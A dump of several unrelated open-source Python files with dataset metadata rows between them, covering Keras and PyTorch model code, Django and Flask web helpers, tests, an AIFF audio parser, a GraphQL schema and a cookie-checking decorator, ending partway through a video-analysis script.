# first: train only the top layers (which were randomly initialized)
# i.e. freeze all convolutional InceptionV3 layers
for layer in base_model.layers:
layer.trainable = False
# compile the model (should be done *after* setting layers to non-trainable)
model.compile(optimizer='rmsprop', loss='binary_crossentropy', metrics=['accuracy'])
return model
def build_model_fine_tuning(model, learning_rate=0.0001, momentum=0.9):
for layer in model.layers[:249]:
layer.trainable = False
for layer in model.layers[249:]:
layer.trainable = True
model.compile(optimizer=SGD(lr=learning_rate, momentum=momentum), loss='binary_crossentropy', metrics=['accuracy'])
return model
def create_callbacks(name):
tensorboard_callback = TensorBoard(log_dir=os.path.join(os.getcwd(), "tb_log", name), write_graph=True, write_grads=False)
checkpoint_callback = ModelCheckpoint(filepath="./model-weights" + name + ".{epoch:02d}-{val_loss:.6f}.hdf5", monitor='val_loss',
verbose=0, save_best_only=True)
return [tensorboard_callback, checkpoint_callback]
def setup_data(train_data_dir, val_data_dir, img_width=299, img_height=299, batch_size=16):
train_datagen = ImageDataGenerator(rescale=1./255)
val_datagen = ImageDataGenerator(rescale=1./255)
train_generator = train_datagen.flow_from_directory(
train_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary')
validation_generator = val_datagen.flow_from_directory(
val_data_dir,
target_size=(img_width, img_height),
batch_size=batch_size,
class_mode='binary')
return train_generator, validation_generator
def main():
data_dir = "data/train/"
val_dir = "data/val/"
epochs = 10
batch_size = 30
model = build_model_feature_extraction()
train_generator, val_generator = setup_data(data_dir, val_dir)
callbacks_fe = create_callbacks(name='feature_extraction')
callbacks_ft = create_callbacks(name='fine_tuning')
# stage 1 fit
model.fit_generator(
train_generator,
steps_per_epoch=train_generator.n // batch_size,
epochs=epochs,
validation_data=val_generator,
validation_steps=val_generator.n // batch_size,
callbacks=callbacks_fe,
verbose=1)
scores = model.evaluate_generator(val_generator, steps=val_generator.n // batch_size)
print("Step 1 Scores: Loss: " + str(scores[0]) + " Accuracy: " + str(scores[1]))
# stage 2 fit
model = build_model_fine_tuning(model)
model.fit_generator(
train_generator,
steps_per_epoch=train_generator.n // batch_size,
epochs=epochs,
validation_data=val_generator,
validation_steps=val_generator.n // batch_size,
callbacks=callbacks_ft,
verbose=2)
scores = model.evaluate_generator(val_generator, steps=val_generator.n // batch_size)
print("Step 2 Scores: Loss: " + str(scores[0]) + " Accuracy: " + str(scores[1]))
if __name__ == "__main__":
main()
| 34.491935
| 133
| 0.710545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 862
| 0.201543
|
b0f8d8e1a99343fc9166ec575752cd7be6e45cee
| 827
|
py
|
Python
|
Pytorch/5-CNN/nn_Sequential.py
|
pengchenyu111/PaperCodeReplication
|
7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a
|
[
"Apache-2.0"
] | null | null | null |
Pytorch/5-CNN/nn_Sequential.py
|
pengchenyu111/PaperCodeReplication
|
7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a
|
[
"Apache-2.0"
] | null | null | null |
Pytorch/5-CNN/nn_Sequential.py
|
pengchenyu111/PaperCodeReplication
|
7b8681654e25b7d707f4b4d7ebcfb85ffc0fd52a
|
[
"Apache-2.0"
] | null | null | null |
import torch
from torch import nn
from torch.nn import Conv2d, MaxPool2d, Flatten, Linear, Sequential
from torch.utils.tensorboard import SummaryWriter
class Tudui(nn.Module):
def __init__(self):
super(Tudui, self).__init__()
self.model1 = Sequential(
Conv2d(3, 32, 5, padding=2),
MaxPool2d(2),
Conv2d(32, 32, 5, padding=2),
MaxPool2d(2),
Conv2d(32, 64, 5, padding=2),
MaxPool2d(2),
Flatten(),
Linear(1024, 64),
Linear(64, 10)
)
def forward(self, x):
x = self.model1(x)
return x
tudui = Tudui()
print(tudui)
input = torch.ones((64, 3, 32, 32))
output = tudui(input)
print(output.shape)
writer = SummaryWriter("./logs")
writer.add_graph(tudui, input)
writer.close()
| 22.972222
| 67
| 0.584039
| 483
| 0.584039
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.009674
|
b0fb6f704b8d712fad268b480c2d25cc8bc409f5
| 1,232
|
py
|
Python
|
src/brewlog/utils/query.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 3
|
2019-03-11T04:30:06.000Z
|
2020-01-26T03:21:52.000Z
|
src/brewlog/utils/query.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | 23
|
2019-02-06T20:37:37.000Z
|
2020-06-01T07:08:35.000Z
|
src/brewlog/utils/query.py
|
zgoda/brewlog
|
13a930b328f81d01a2be9aca07d3b14703b80faa
|
[
"BSD-3-Clause"
] | null | null | null |
from typing import Optional
from flask import url_for
from flask_sqlalchemy import BaseQuery
from ..ext import db
from ..models import Brew, BrewerProfile
def public_or_owner(query: BaseQuery, user: Optional[BrewerProfile]) -> BaseQuery:
"""Filter Brew query of all non-accessible objects.
:param query: query over Brew objects
:type query: BaseQuery
:param user: actor object, may be None
:type user: Optional[BrewerProfile]
:return: filtered query
:rtype: BaseQuery
"""
if user is not None:
query = query.filter(
db.or_(
BrewerProfile.id == user.id,
db.and_(BrewerProfile.is_public.is_(True), Brew.is_public.is_(True))
)
)
else:
query = query.filter(
BrewerProfile.is_public.is_(True), Brew.is_public.is_(True)
)
return query
def search_result(query, endpoint, attr_name):
res = []
id_col = query.column_descriptions[0]['entity'].id
name_col = query.column_descriptions[0]['entity'].name
for obj_id, obj_name in query.values(id_col, name_col):
kw = {attr_name: obj_id}
res.append({'name': obj_name, 'url': url_for(endpoint, **kw)})
return res
| 29.333333
| 84
| 0.649351
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 289
| 0.234578
|
b0fda5ff40de8e081dd602a278f08974ff524613
| 11,355
|
py
|
Python
|
adventures/bucketlist/tests/test_api.py
|
lakivisi-zz/adventures
|
f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5
|
[
"MIT"
] | null | null | null |
adventures/bucketlist/tests/test_api.py
|
lakivisi-zz/adventures
|
f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5
|
[
"MIT"
] | null | null | null |
adventures/bucketlist/tests/test_api.py
|
lakivisi-zz/adventures
|
f094ac3fa1d5c85d65650c9cdc2ff2f60f9189a5
|
[
"MIT"
] | 1
|
2021-01-14T21:27:32.000Z
|
2021-01-14T21:27:32.000Z
|
from django.urls import reverse
from rest_framework import status
from rest_framework.test import APITestCase
from bucketlist.models import Bucketlist, Item
from bucketlist.tests.factories import (BucketlistFactory,
UserFactory,
ItemFactory)
# Create your tests here.
class RegisterApiTestSuite(APITestCase):
def setUp(self):
self.user = UserFactory.build()
def test_user_can_register_with_correct_credentials(self):
url = reverse('register')
data = {'username': self.user.username,
'email': self.user.email,
'password': self.user.password}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertIn(
'"username":"{}","email":"{}"'.format(
self.user.username,
self.user.email),
str(response.content))
# test_user_cant_register_twice
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, 400)
self.assertIn(
'"username":["A user with that username already exists."]',
str(response.content))
def test_user_cant_register_with_wrong_credentials(self):
url = reverse('register')
data = {'username': self.user.username,
'email': "wq",
'password': self.user.password}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, 400)
self.assertIn(
'"email":["Enter a valid email address."]',
str(response.content))
def test_user_cant_register_with_blank_credentials(self):
url = reverse('register')
data = {'username': ' ',
'email': ' ',
'password': ' '}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, 400)
self.assertIn(
'"username":["This field may not be blank."]',
str(response.content))
class LoginAPITestSuite(APITestCase):
def setUp(self):
self.user = UserFactory.build()
url = reverse('register')
data = {'username': self.user.username,
'email': self.user.email,
'password': self.user.password}
self.client.post(url, data, format='json')
self.url = reverse('login')
self.data = {'username': self.user.username,
'password': self.user.password}
def test_registered_user_can_login(self):
response = self.client.post(self.url, self.data, format='json')
self.assertEqual(response.status_code, 200)
self.assertIn('token', str(response.content))
def test_login_with_blank_credentials(self):
response = self.client.post(
self.url,
{'username': '', 'password': ''},
format='json')
self.assertEqual(response.status_code, 400)
self.assertIn(
'"username":["This field may not be blank."]',
str(response.content))
self.assertIn(
'"password":["This field may not be blank."]',
str(response.content))
def test_login_with_wrong_credentials(self):
response = self.client.post(self.url,
{'username': 'loice', 'password': 'loice'},
format='json')
self.assertEqual(response.status_code, 400)
self.assertIn('Unable to login with provided credentials',
str(response.content))
class BucketlistAPITestSuite(APITestCase):
def setUp(self):
self.user = UserFactory.build()
bucketlists = BucketlistFactory.build_batch(2)
self.bucketlist1 = bucketlists[0]
self.bucketlist2 = bucketlists[1]
# register a user
url = reverse('register')
data = {'username': self.user.username,
'email': self.user.email,
'password': self.user.password}
self.client.post(url, data, format='json')
# login user
response = self.client.post(reverse('login'),
{'username': self.user.username,
'password': self.user.password},
format='json'
)
self.token = response.data['token']
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# add one bucketlist
self.data = {'name': self.bucketlist2.name,
'description': self.bucketlist2.description}
response = self.client.post(
reverse('bucketlists'),
self.data,
format='json')
self.bucketlist = Bucketlist.objects.get(name=self.bucketlist2.name)
def test_user_can_create_bucketlist(self):
url = reverse('bucketlists')
data = {'name': self.bucketlist1.name,
'description': self.bucketlist1.description}
response = self.client.post(url,
data,
format='json')
data = response.data
self.assertIsNotNone(data['id'])
self.assertEqual(data['name'], self.bucketlist1.name)
def test_user_cant_create_bucketlist_with_same_name(self):
response = self.client.post(reverse('bucketlists'),
self.data,
format='json')
data = response.data
self.assertEqual(data['name'], ["bucketlist already exists"])
def test_can_list_bucketlists(self):
response = self.client.get(reverse('bucketlists'))
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual(self.bucketlist2.name, data[0]['name'])
def test_can_list_one_bucketlist(self):
response = self.client.get(
reverse('one_bucketlist', kwargs={'pk': self.bucketlist.id}))
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual(self.bucketlist2.name, data['name'])
def test_can_edit_one_bucketlist(self):
response = self.client.put(
reverse('one_bucketlist', kwargs={'pk': self.bucketlist.id}),
{'name': 'holiday',
'description': self.bucketlist2.description},
format='json')
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual('holiday', data['name'])
def test_can_delete_one_bucketlist(self):
response = self.client.delete(
reverse('one_bucketlist', kwargs={'pk': 1}))
self.assertEqual(response.status_code, 204)
response = self.client.get(
reverse('one_bucketlist', kwargs={'pk': 1}),
headers={'Authorization': 'JWT ' + self.token})
data = response.data
self.assertEqual(response.status_code, 404)
self.assertEqual("Not found.", data["detail"])
class ItemAPITestSuite(APITestCase):
def setUp(self):
self.user = UserFactory.build()
bucketlist = BucketlistFactory.build()
items = ItemFactory.build_batch(2)
self.item1 = items[0]
self.item2 = items[1]
# register a user
url = reverse('register')
data = {'username': self.user.username,
'email': self.user.email,
'password': self.user.password}
self.client.post(url, data, format='json')
# login user
response = self.client.post(reverse('login'),
{'username': self.user.username,
'password': self.user.password},
format='json'
)
self.token = response.data['token']
self.client.credentials(HTTP_AUTHORIZATION='JWT ' + self.token)
# add one bucketlist
data = {'name': bucketlist.name,
'description': bucketlist.description}
self.client.post(
reverse('bucketlists'), data, format='json')
self.bucketlist = Bucketlist.objects.get(name=bucketlist.name)
self.data = {'name': self.item1.name,
'description': self.item1.description,
'completed': self.item1.completed}
self.client.post(reverse('items', kwargs={'bucketlist_id': self.bucketlist.id}),
self.data,
format='json')
self.item = Item.objects.get(
name=self.item1.name, bucketlist=self.bucketlist)
def test_user_can_create_item(self):
url = reverse('items', kwargs={'bucketlist_id': self.bucketlist.id})
data = {'name': self.item2.name,
'description': self.item2.description,
'completed': self.item2.completed}
response = self.client.post(url, data, format='json')
data = response.data
self.assertIsNotNone(data['id'])
self.assertEqual(data['name'], self.item2.name)
def test_user_cant_create_item_with_same_name_in_one_bucketlist(self):
url = reverse('items', kwargs={'bucketlist_id': self.bucketlist.id})
response = self.client.post(url, self.data, format='json')
data = response.data
self.assertEqual(data['name'], ["item already exists in bucketlist"])
def test_can_list_bucketlist_items(self):
url = reverse('items', kwargs={'bucketlist_id': self.bucketlist.id})
response = self.client.get(url)
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual(self.item1.name, data[0]['name'])
def test_can_list_one_bucketlist_item(self):
url = reverse('one_item', kwargs={'bucketlist_id': self.bucketlist.id,
'pk': self.item.id})
response = self.client.get(url)
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual(self.item1.name, data['name'])
def test_can_edit_one_bucketlist_item(self):
url = reverse('one_item', kwargs={'bucketlist_id': self.bucketlist.id,
'pk': self.item.id})
response = self.client.put(url,
{'name': 'israel trip',
'description': self.item1.description,
'completed': self.item1.completed},
format='json')
data = response.data
self.assertEqual(response.status_code, 200)
self.assertEqual('israel trip', data['name'])
def test_can_delete_one_bucketlist_item(self):
url = reverse('one_item', kwargs={'bucketlist_id': self.bucketlist.id,
'pk': self.item.id})
response = self.client.delete(url)
self.assertEqual(response.status_code, 204)
response = self.client.get(url)
data = response.data
self.assertEqual(response.status_code, 404)
self.assertEqual("Not found.", data["detail"])
| 41.593407
| 88
| 0.574813
| 10,993
| 0.96812
| 0
| 0
| 0
| 0
| 0
| 0
| 1,716
| 0.151123
|
b0fdbad819a58bb24f68fffc89eae7b13da8ac0a
| 514
|
py
|
Python
|
src/model/match.py
|
HarborYuan/Student-Information-Management-System
|
7226bdea9a422cc88876ba58f1e36e4f7087342d
|
[
"Apache-2.0"
] | null | null | null |
src/model/match.py
|
HarborYuan/Student-Information-Management-System
|
7226bdea9a422cc88876ba58f1e36e4f7087342d
|
[
"Apache-2.0"
] | null | null | null |
src/model/match.py
|
HarborYuan/Student-Information-Management-System
|
7226bdea9a422cc88876ba58f1e36e4f7087342d
|
[
"Apache-2.0"
] | 1
|
2018-12-03T11:43:37.000Z
|
2018-12-03T11:43:37.000Z
|
import re
class IsCellphone():
def __init__(self):
self.p = re.compile(r'[1][^1269]\d{9}')
def iscellphone(self, number):
res = self.p.match(number)
if res:
return True
else:
return False
class IsMail():
def __init__(self):
self.p = re.compile(r'[^\._][\w\._-]+@(?:[A-Za-z0-9]+\.)+[A-Za-z]+$')
def ismail(self, str):
res = self.p.match(str)
if res:
return True
else:
return False
| 19.769231
| 77
| 0.486381
| 498
| 0.968872
| 0
| 0
| 0
| 0
| 0
| 0
| 66
| 0.128405
|
b0feb9c47583568b91cc55ff1a17eb9a915a0f41
| 1,626
|
py
|
Python
|
framework/repository/info.py
|
jarret/bitcoin_helpers
|
4b6155ea3b004ad58a717b36cd58138d058281b1
|
[
"MIT"
] | null | null | null |
framework/repository/info.py
|
jarret/bitcoin_helpers
|
4b6155ea3b004ad58a717b36cd58138d058281b1
|
[
"MIT"
] | null | null | null |
framework/repository/info.py
|
jarret/bitcoin_helpers
|
4b6155ea3b004ad58a717b36cd58138d058281b1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import json
import os
import sys
from framework.path.path import Path
from framework.file.io import read_file
from framework.git.path import GitPath
REPO_INFO_FILENAME = ".bitcoin-maintainer-tools.json"
FAILBACK_REPO_INFO_FILENAME = ".fallback-bitcoin-maintainer-tools.json"
class RepositoryInfo(dict):
"""
Dictionary that is sourced from a json file in the target repository.
If the file doesn't exist, a fallback file is used for the settings.
"""
def __init__(self, repository_base):
super().__init__()
json_file = os.path.join(repository_base, REPO_INFO_FILENAME)
path = Path(json_file)
if not path.exists():
# If there is no .json file in the repo, it might be an old version
# checked out. We can still do best-effort with a default file
# that is located in this repo.
json_file = self._failback_file()
path = Path(json_file)
if not path.exists():
sys.exit("Could not find a .json repository info file to use.")
path.assert_is_file()
path.assert_mode(os.R_OK)
content = read_file(json_file)
self.update(json.loads(content))
def _failback_file(self):
gp = GitPath(os.path.abspath(os.path.realpath(__file__)))
return os.path.join(str(gp.repository_base()),
FAILBACK_REPO_INFO_FILENAME)
| 36.954545
| 79
| 0.674662
| 1,136
| 0.698647
| 0
| 0
| 0
| 0
| 0
| 0
| 649
| 0.399139
|
b0ff358c2ba4c5c042b20c8c472910cebd571e0f
| 861
|
py
|
Python
|
backend/members/schema.py
|
singsaker/intern
|
9376732c6d537f46443ad43afa51e82df2005da8
|
[
"MIT"
] | 4
|
2021-10-06T19:09:12.000Z
|
2022-03-28T12:14:42.000Z
|
backend/members/schema.py
|
singsaker/intern
|
9376732c6d537f46443ad43afa51e82df2005da8
|
[
"MIT"
] | 2
|
2021-11-30T16:07:05.000Z
|
2022-02-17T23:57:00.000Z
|
backend/members/schema.py
|
singsaker/intern
|
9376732c6d537f46443ad43afa51e82df2005da8
|
[
"MIT"
] | null | null | null |
import graphene
import graphql_jwt
from .resolvers import MemberResolvers
from .types import MemberType, UserType
class MemberQueries(graphene.ObjectType, MemberResolvers):
member = graphene.Field(MemberType, id=graphene.ID(required=True))
all_users = graphene.List(UserType)
all_members = graphene.List(MemberType)
all_active_members = graphene.List(MemberType)
user = graphene.Field(UserType)
user_details = graphene.Field(UserType)
send_email = graphene.Field(UserType)
class UserMutations(graphene.ObjectType):
token_auth = graphql_jwt.ObtainJSONWebToken.Field()
verify_token = graphql_jwt.Verify.Field()
refresh_token = graphql_jwt.Refresh.Field()
delete_token_cookie = graphql_jwt.DeleteJSONWebTokenCookie.Field()
# Mulig bare romsjef skal ha mulighet til dette?
# create_user = CreateUser.Field()
| 34.44
| 70
| 0.773519
| 740
| 0.859466
| 0
| 0
| 0
| 0
| 0
| 0
| 82
| 0.095238
|
b0ffaa7976be25e795d5abe04edf6fd2fd0631eb
| 1,540
|
py
|
Python
|
cookie_manager/security_decorator.py
|
ScholarPack/cookie-manager
|
342eaf19d4ebbe83319306e4a3afcc3988f61d3d
|
[
"MIT"
] | 10
|
2020-02-26T14:13:05.000Z
|
2021-07-30T02:16:47.000Z
|
cookie_manager/security_decorator.py
|
ScholarPack/cookie-manager
|
342eaf19d4ebbe83319306e4a3afcc3988f61d3d
|
[
"MIT"
] | 13
|
2020-02-26T10:42:09.000Z
|
2021-09-30T13:26:23.000Z
|
cookie_manager/security_decorator.py
|
ScholarPack/cookie-manager
|
342eaf19d4ebbe83319306e4a3afcc3988f61d3d
|
[
"MIT"
] | 3
|
2020-03-29T00:49:23.000Z
|
2020-07-24T16:26:20.000Z
|
from functools import wraps
from typing import List, Any
from cookie_manager import CookieManager
class CookieSecurityDecorator:
_cookie_manager = None
_request = None
_cookie_name = None
def init_app(self, request: Any, cookie_manager: CookieManager, cookie_name: str):
"""
Initialise the security decorators
:param request: An object with the attribute `cookies`
:param cookie_manager: The instance of the cookie manager to be used for the decorator
:param cookie_name: The name of the cookie to read from the request
"""
self._request = request
self._cookie_manager = cookie_manager
self._cookie_name = cookie_name
def keys_required(self, keys: List = []):
"""
:param keys: A list of cookie signing keys that are allowed to use a decorated endpoint.
:raises Unauthorized: When the route is accessed without a valid key id
:return: wrapper
"""
def route_wrapper(f):
@wraps(f)
def wrapper(*args, **kwds):
verfied_cookie = self._cookie_manager.verify(
signed_cookie=self._request.cookies.get(self._cookie_name)
)
key_id = verfied_cookie.get("key_id")
if len(keys) == 0 or key_id in keys:
return f(*args, **kwds)
else:
raise self._cookie_manager._exceptions.Unauthorized()
return wrapper
return route_wrapper
| 34.222222
| 96
| 0.619481
| 1,439
| 0.934416
| 0
| 0
| 456
| 0.296104
| 0
| 0
| 517
| 0.335714
|
7c0015d18f7709ad1f58810e4e4fbcf0c3ae1358
| 6,394
|
py
|
Python
|
mutagen/aiff.py
|
lucienimmink/scanner.py
|
cecaa0a570ba8058321dea1c8efa9f77868effb3
|
[
"MIT"
] | 2
|
2022-03-14T15:34:14.000Z
|
2022-03-23T17:05:42.000Z
|
mutagen/aiff.py
|
lucienimmink/scanner.py
|
cecaa0a570ba8058321dea1c8efa9f77868effb3
|
[
"MIT"
] | null | null | null |
mutagen/aiff.py
|
lucienimmink/scanner.py
|
cecaa0a570ba8058321dea1c8efa9f77868effb3
|
[
"MIT"
] | 2
|
2020-09-17T08:27:12.000Z
|
2021-08-23T11:13:52.000Z
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Evan Purkhiser
# 2014 Ben Ockmore
# 2019-2020 Philipp Wolfer
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
"""AIFF audio stream information and tags."""
import struct
from struct import pack
from mutagen import StreamInfo, FileType
from mutagen.id3._util import ID3NoHeaderError, error as ID3Error
from mutagen._iff import (
IffChunk,
IffContainerChunkMixin,
IffFile,
IffID3,
InvalidChunk,
error as IffError,
)
from mutagen._util import (
convert_error,
loadfile,
endswith,
)
__all__ = ["AIFF", "Open", "delete"]
class error(IffError):
pass
# based on stdlib's aifc
_HUGE_VAL = 1.79769313486231e+308
def read_float(data):
"""Raises OverflowError"""
assert len(data) == 10
expon, himant, lomant = struct.unpack('>hLL', data)
sign = 1
if expon < 0:
sign = -1
expon = expon + 0x8000
if expon == himant == lomant == 0:
f = 0.0
elif expon == 0x7FFF:
raise OverflowError("inf and nan not supported")
else:
expon = expon - 16383
# this can raise OverflowError too
f = (himant * 0x100000000 + lomant) * pow(2.0, expon - 63)
return sign * f
class AIFFChunk(IffChunk):
"""Representation of a single IFF chunk"""
@classmethod
def parse_header(cls, header):
return struct.unpack('>4sI', header)
@classmethod
def get_class(cls, id):
if id == 'FORM':
return AIFFFormChunk
else:
return cls
def write_new_header(self, id_, size):
self._fileobj.write(pack('>4sI', id_, size))
def write_size(self):
self._fileobj.write(pack('>I', self.data_size))
class AIFFFormChunk(AIFFChunk, IffContainerChunkMixin):
"""The AIFF root chunk."""
def parse_next_subchunk(self):
return AIFFChunk.parse(self._fileobj, self)
def __init__(self, fileobj, id, data_size, parent_chunk):
if id != u'FORM':
raise InvalidChunk('Expected FORM chunk, got %s' % id)
AIFFChunk.__init__(self, fileobj, id, data_size, parent_chunk)
self.init_container()
class AIFFFile(IffFile):
"""Representation of a AIFF file"""
def __init__(self, fileobj):
# AIFF Files always start with the FORM chunk which contains a 4 byte
# ID before the start of other chunks
super().__init__(AIFFChunk, fileobj)
if self.root.id != u'FORM':
raise InvalidChunk("Root chunk must be a FORM chunk, got %s"
% self.root.id)
def __contains__(self, id_):
if id_ == 'FORM': # For backwards compatibility
return True
return super().__contains__(id_)
def __getitem__(self, id_):
if id_ == 'FORM': # For backwards compatibility
return self.root
return super().__getitem__(id_)
class AIFFInfo(StreamInfo):
"""AIFFInfo()
AIFF audio stream information.
Information is parsed from the COMM chunk of the AIFF file
Attributes:
length (`float`): audio length, in seconds
bitrate (`int`): audio bitrate, in bits per second
channels (`int`): The number of audio channels
sample_rate (`int`): audio sample rate, in Hz
bits_per_sample (`int`): The audio sample size
"""
length = 0
bitrate = 0
channels = 0
sample_rate = 0
@convert_error(IOError, error)
def __init__(self, fileobj):
"""Raises error"""
iff = AIFFFile(fileobj)
try:
common_chunk = iff[u'COMM']
except KeyError as e:
raise error(str(e))
data = common_chunk.read()
if len(data) < 18:
raise error
info = struct.unpack('>hLh10s', data[:18])
channels, frame_count, sample_size, sample_rate = info
try:
self.sample_rate = int(read_float(sample_rate))
except OverflowError:
raise error("Invalid sample rate")
if self.sample_rate < 0:
raise error("Invalid sample rate")
if self.sample_rate != 0:
self.length = frame_count / float(self.sample_rate)
self.bits_per_sample = sample_size
self.sample_size = sample_size # For backward compatibility
self.channels = channels
self.bitrate = channels * sample_size * self.sample_rate
def pprint(self):
return u"%d channel AIFF @ %d bps, %s Hz, %.2f seconds" % (
self.channels, self.bitrate, self.sample_rate, self.length)
class _IFFID3(IffID3):
"""A AIFF file with ID3v2 tags"""
def _load_file(self, fileobj):
return AIFFFile(fileobj)
@convert_error(IOError, error)
@loadfile(method=False, writable=True)
def delete(filething):
"""Completely removes the ID3 chunk from the AIFF file"""
try:
del AIFFFile(filething.fileobj)[u'ID3']
except KeyError:
pass
class AIFF(FileType):
"""AIFF(filething)
An AIFF audio file.
Arguments:
filething (filething)
Attributes:
tags (`mutagen.id3.ID3`)
info (`AIFFInfo`)
"""
_mimes = ["audio/aiff", "audio/x-aiff"]
@staticmethod
def score(filename, fileobj, header):
filename = filename.lower()
return (header.startswith(b"FORM") * 2 + endswith(filename, b".aif") +
endswith(filename, b".aiff") + endswith(filename, b".aifc"))
def add_tags(self):
"""Add an empty ID3 tag to the file."""
if self.tags is None:
self.tags = _IFFID3()
else:
raise error("an ID3 tag already exists")
@convert_error(IOError, error)
@loadfile()
def load(self, filething, **kwargs):
"""Load stream and tag information from a file."""
fileobj = filething.fileobj
try:
self.tags = _IFFID3(fileobj, **kwargs)
except ID3NoHeaderError:
self.tags = None
except ID3Error as e:
raise error(e)
else:
self.tags.filename = self.filename
fileobj.seek(0, 0)
self.info = AIFFInfo(fileobj)
Open = AIFF
| 25.99187
| 78
| 0.610416
| 4,688
| 0.733187
| 0
| 0
| 2,195
| 0.343291
| 0
| 0
| 1,951
| 0.30513
|
7c007a5d23b8a2015cedebc0918ddd73086265d1
| 398
|
py
|
Python
|
secrets_example.py
|
fuzzysearch404/SpotifyPlaylistScripts
|
17915742ca666edd8376f04d0e2687b207c32471
|
[
"MIT"
] | null | null | null |
secrets_example.py
|
fuzzysearch404/SpotifyPlaylistScripts
|
17915742ca666edd8376f04d0e2687b207c32471
|
[
"MIT"
] | 1
|
2021-11-03T13:40:55.000Z
|
2021-11-03T13:40:55.000Z
|
secrets_example.py
|
fuzzysearch404/SpotifyPlaylistScripts
|
17915742ca666edd8376f04d0e2687b207c32471
|
[
"MIT"
] | null | null | null |
# Spotify web application client ID
CLIENT_ID = 'your_client_id'
# Spotify web application client secret
CLIENT_SECRET = 'your_client_secret'
# Redirect URI. This can be any uri.
# Howerver, you MUST add this uri to your Spotify web app's settings.
# Application settings -> Edit Settings -> Redirect URIs.
# Add it there and save the settings.
REDIRECT_URI = 'https://localhost:2020/done'
| 44.222222
| 70
| 0.753769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 345
| 0.866834
|
7c02196ff08fda517c472d6a6325f606f3df8cac
| 1,210
|
py
|
Python
|
tradeiobot/db/stores/abstractstore.py
|
hcv57/tradeio-bot
|
a4c9f96a104e20ca0618d8d787cfef3599c8ebb7
|
[
"MIT"
] | 2
|
2018-10-28T18:47:02.000Z
|
2019-10-09T14:52:04.000Z
|
tradeiobot/db/stores/abstractstore.py
|
hcv57/tradeio-bot
|
a4c9f96a104e20ca0618d8d787cfef3599c8ebb7
|
[
"MIT"
] | null | null | null |
tradeiobot/db/stores/abstractstore.py
|
hcv57/tradeio-bot
|
a4c9f96a104e20ca0618d8d787cfef3599c8ebb7
|
[
"MIT"
] | null | null | null |
import abc
class AbstractStore(abc.ABC):
def get(self, table, key, next_store_action):
value = self.do_get(table, key)
if not value:
value = next_store_action(table, key)
if value: # then update the local store
self.do_set(table, key, value)
return value
def get_all_as_dict(self, table, next_store_action):
values = self.do_get_all_as_dict(table)
if not values:
values = next_store_action(table)
if values:
for k, v in values:
self.do_set(table, k, v)
return values or dict()
def set(self, table, key, value, next_store_action):
self.do_set(table, key, value)
next_store_action(table, key, value)
def delete(self, table, key, next_store_action):
self.do_delete(table, key)
next_store_action(table, key)
@abc.abstractmethod
def do_get(self, table, key):
pass
@abc.abstractmethod
def do_get_all_as_dict(self, table):
pass
@abc.abstractmethod
def do_set(self, table, key, value):
pass
@abc.abstractmethod
def do_delete(self, table, key):
pass
| 26.888889
| 56
| 0.602479
| 1,197
| 0.989256
| 0
| 0
| 281
| 0.232231
| 0
| 0
| 29
| 0.023967
|
7c037d89e3a9bf24f7302ca98b6d3dd08cac776e
| 11,062
|
py
|
Python
|
ML/meanvel.py
|
lewisfish/Triton-dolphin
|
bc7256485e1bd943e0b9b3017c214c82e26905f3
|
[
"MIT"
] | null | null | null |
ML/meanvel.py
|
lewisfish/Triton-dolphin
|
bc7256485e1bd943e0b9b3017c214c82e26905f3
|
[
"MIT"
] | null | null | null |
ML/meanvel.py
|
lewisfish/Triton-dolphin
|
bc7256485e1bd943e0b9b3017c214c82e26905f3
|
[
"MIT"
] | null | null | null |
from concurrent import futures
from itertools import repeat
import pathlib
from pathlib import Path
import pickle
import time
from typing import List, Tuple, Union
import cv2 as cv2
import hdbscan
import numpy as np
import pims
from sklearn.cluster import KMeans
from sklearn.preprocessing import StandardScaler
from tqdm import tqdm
from gps import getAltitude
from ocr import getMagnification
def _getFullFileName(files: List[pathlib.PosixPath], target: str) -> pathlib.PosixPath:
'''Match a file to list of full filenames
Parameters
----------
files : List[pathlib.PosixPath]
List of file name to match to
target : str
File to be matched with full path
Returns
-------
file : pathlib.PosixPath
Full filename
'''
for file in files:
if target in str(file):
return file
def getFrames(file: str, position: int, offset: int) -> Tuple[List[pims.frame.Frame], List[int], float]:
"""Get 3 frames for optical flow analysis. Frames are serperated by +/- offset.
Central frame is at position.
Parameters
----------
file : str
Video file to get frames from
position : int
Position of central frame
offset : int
offset to get other frames for optical flow analysis
Returns
-------
Tuple[List[pims.frame.Frame], List[int], float]
Frames at position, +/- offset, list of frame positions, fps of video
"""
assert position > offset
video = pims.PyAVVideoReader(file)
frame0 = video[position - offset]
frame1 = video[position]
frame2 = video[position + offset]
return [frame0, frame1, frame2], [position - offset, position, position + offset], float(video._frame_rate)
def getFramesCV2(file: str, position: int, offset: int):
"""Get 3 frames for optical flow analysis using cv2. Frames are serperated by +/- offset.
Central frame is at position.
Parameters
----------
file : str
